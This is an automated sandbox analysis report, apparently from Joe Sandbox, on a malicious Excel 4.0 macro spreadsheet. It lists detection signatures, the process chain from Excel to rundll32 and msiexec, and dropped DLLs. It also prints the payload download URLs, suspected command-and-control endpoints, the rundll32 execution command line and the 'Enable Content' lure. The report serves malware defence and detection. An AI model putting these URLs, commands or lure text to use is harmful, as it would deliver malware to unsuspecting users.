Loading ...

Play interactive tourEdit tour

Analysis Report case (4335).xls

Overview

General Information

Sample Name:case (4335).xls
Analysis ID:344665
MD5:bf86559630b855e4bf2c54d641147b24
SHA1:182cbac1bdd020fa5fee6ed9d6a50d1071fbe320
SHA256:31ea3370ca06a2af45514a59a0ae49dc62ac34bc4dce44402f169a9d6fb93853
Tags:xls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Contains functionality to inject code into remote processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found malicious URLs in unpacked macro 4.0 sheet
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the product ID of Windows
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2240 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2312 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2408 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • msiexec.exe (PID: 2848 cmdline: msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
case (4335).xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2240, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, ProcessId: 2312

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: 4.2.rundll32.exe.340000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
    Source: 5.2.msiexec.exe.d0000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Uses secure TLS version for HTTPS connectionsShow sources
    Source: unknownHTTPS traffic detected: 172.67.150.228:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.200.147:443 -> 192.168.2.22:49166 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.60.169:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.73.69:443 -> 192.168.2.22:49168 version: TLS 1.2
    Binary contains paths to debug symbolsShow sources
    Source: Binary string: c:\PlanetAllow\OpenRoll\cellNumeral\money.pdb source: scfrd[1].dll.0.dr

    Software Vulnerabilities:

    barindex
    Document exploit detected (creates forbidden files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to behavior
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: scfrd[1].dll.0.drJump to dropped file
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then push 0000000Ah
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then mov eax, dword ptr [edi-08h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then push 00000000h
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then add esi, 02h
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then push 0000000Ah
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov eax, dword ptr [edi-08h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then add esi, 02h
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then push 00000000h
    Source: global trafficDNS query: name: rnollg.com
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.150.228:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.150.228:443

    Networking:

    barindex
    Found malicious URLs in unpacked macro 4.0 sheetShow sources
    Source: before.1.0.0.sheet.csv_unpackMacro 4.0 Deobfuscator: https://rnollg.com/kev/scfrd.dll
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000D1AF0 InternetReadFile,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
    Source: msiexec.exe, 00000005.00000002.2356048675.000000000048D000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
    Source: rundll32.exe, 00000003.00000002.2155870146.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: msiexec.exe, 00000005.00000002.2356048675.000000000048D000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
    Source: unknownDNS traffic detected: queries for: rnollg.com
    Source: msiexec.exe, 00000005.00000002.2356064287.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
    Source: msiexec.exe, 00000005.00000002.2356064287.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
    Source: msiexec.exe, 00000005.00000002.2356064287.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
    Source: msiexec.exe, 00000005.00000002.2356064287.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
    Source: msiexec.exe, 00000005.00000002.2356064287.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0K
    Source: rundll32.exe, 00000003.00000002.2155870146.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000003.00000002.2155870146.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000003.00000002.2157152768.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2155127079.0000000001FB7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000003.00000002.2157152768.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2155127079.0000000001FB7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
    Source: msiexec.exe, 00000005.00000002.2356064287.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: msiexec.exe, 00000005.00000002.2356064287.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
    Source: msiexec.exe, 00000005.00000002.2356240442.0000000002060000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: rundll32.exe, 00000003.00000002.2157152768.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2155127079.0000000001FB7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000003.00000002.2157152768.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2155127079.0000000001FB7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: 0FDE0000.0.drString found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)
    Source: case (4335).xlsString found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~
    Source: msiexec.exe, 00000005.00000002.2356240442.0000000002060000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
    Source: msiexec.exe, 00000005.00000002.2356064287.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com/CPS0
    Source: msiexec.exe, 00000005.00000002.2356064287.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: rundll32.exe, 00000003.00000002.2155870146.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000003.00000002.2157152768.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2155127079.0000000001FB7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000003.00000002.2155870146.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: msiexec.exe, 00000005.00000002.2356048675.000000000048D000.00000004.00000020.sdmpString found in binary or memory: https://gadgetswolf.com/
    Source: msiexec.exe, 00000005.00000002.2356048675.000000000048D000.00000004.00000020.sdmpString found in binary or memory: https://gadgetswolf.com/f
    Source: msiexec.exe, 00000005.00000002.2356048675.000000000048D000.00000004.00000020.sdmpString found in binary or memory: https://gadgetswolf.com/post.phpMb
    Source: msiexec.exe, 00000005.00000002.2356048675.000000000048D000.00000004.00000020.sdmpString found in binary or memory: https://gadgetswolf.com/post.phpab
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: https://govemedico.tk/post.php
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: https://homesoapmolds.com/
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
    Source: before.1.0.0.sheet.csv_unpackString found in binary or memory: https://rnollg.com/kev/scfrd.dll
    Source: case (4335).xls, 0FDE0000.0.drString found in binary or memory: https://rnollg.com/kev/scfrd.dll$8
    Source: msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
    Source: msiexec.exe, 00000005.00000002.2356064287.00000000004C2000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
    Source: unknownHTTPS traffic detected: 172.67.150.228:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.200.147:443 -> 192.168.2.22:49166 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.60.169:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.73.69:443 -> 192.168.2.22:49168 version: TLS 1.2

    System Summary:

    barindex
    Found malicious Excel 4.0 MacroShow sources
    Source: case (4335).xlsInitial sample: URLDownloadToFileA
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable content on the yellow bar to run plugin Core decryption. 9 10 11 12 13 14 15 16 17
    Source: Screenshot number: 8Screenshot OCR: Enable Content X I J10 - "," jR V A B C D E F G H I J K L M N O P Q R S L=j 301 302 303 304
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: case (4335).xlsInitial sample: CALL
    Source: case (4335).xlsInitial sample: CALL
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: case (4335).xlsInitial sample: Sheet size: 503434
    Found obfuscated Excel 4.0 MacroShow sources
    Source: case (4335).xlsInitial sample: High usage of CHAR() function: 147
    Office process drops PE fileShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
    Source: C:\Windows\SysWOW64\msiexec.exeMemory allocated: 76E20000 page execute and read and write
    Source: C:\Windows\SysWOW64\msiexec.exeMemory allocated: 76D20000 page execute and read and write
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00349C60
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00343A30
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0035DA70
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00349A60
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00355BF0
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0040D806
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0040F8FD
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0040D2C4
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0040BB6E
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0040DD48
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000D9C60
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000D3A30
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000D9A60
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000EDA70
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000E5BF0
    Source: Joe Sandbox ViewDropped File: C:\ProgramData\formnet.dll 0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll 0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
    Source: way.dll.5.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: rundll32.exe, 00000003.00000002.2155870146.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal100.expl.evad.winXLS@7/12@4/4
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000E9C90 AdjustTokenPrivileges,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003569A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\0FDE0000Jump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{6564EBFF-51EC-A92E-3E66-73D0C2BEFC46}
    Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{451CDBFF-61EC-8956-3E66-73D0C2BEFC46}
    Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{F5F5D963-6370-39BF-3E66-73D0C2BEFC46}
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD171.tmpJump to behavior
    Source: case (4335).xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: c:\PlanetAllow\OpenRoll\cellNumeral\money.pdb source: scfrd[1].dll.0.dr
    Source: case (4335).xlsInitial sample: OLE summary lastprinted = 2021-01-26 16:17:13
    Source: case (4335).xlsInitial sample: OLE indicators vbamacros = False
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0034D830 LoadLibraryA,GetProcAddress,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0036D1F2 push dword ptr [ecx]; iretd
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0036E9FA push esi; retf
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0036EA51 push esi; retf
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00369A5D push ebp; iretd
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003682EB push eax; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_004093ED push ecx; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0036B56F push esp; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0036B700 push ss; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00422B73 push esi; ret
    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Ubc\way.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003569A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,
